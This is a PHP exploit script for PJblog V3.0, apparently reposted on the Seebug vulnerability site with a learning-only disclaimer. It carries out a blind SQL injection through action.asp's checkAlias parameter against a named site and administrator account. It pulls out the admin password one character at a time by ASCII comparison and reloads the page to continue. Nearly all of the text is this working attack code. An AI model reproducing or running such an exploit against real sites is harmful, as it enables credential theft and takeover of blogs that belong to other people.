<?php /* PJblog V3.0 0day exp code by 小蟑螂&bink www.0kee.com www.t00ls.net 09.04.22 */ $url="http://www.pjhome.net"; //注入地址 $var_name="puterjam"; //管理员 $var_key="check_right"; if ($_SESSION["LenI"]){ $LenI=$_SESSION["LenI"]; }else{ $LenI=1; } for($i=$LenI;$i<=40;$i++){ if($_SESSION["LenDo"]){ $StaAsc=$_SESSION["LenDo"]; }else{ $StaAsc=31; } echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127"; for($j=$StaAsc;$j<=127;$j++){ $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1'; $var_pagelen=file_get_contents($newurl); $var_newpagelen=strpos($var_pagelen,$var_key); if($var_newpagelen == true){ $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j); unset($_SESSION["LenDo"]); $_SESSION["LenI"]=$i+1; doReload(); break; } if($j == $StaAsc+10){ doReload(); break; } } } if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; } function doReload(){ ?> <script language="javascript"> <!-- window.setTimeout('location.reload()',1000); //--> </script> <?php } ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
共 1 兑换
京公网安备 11010502034610号
暂无评论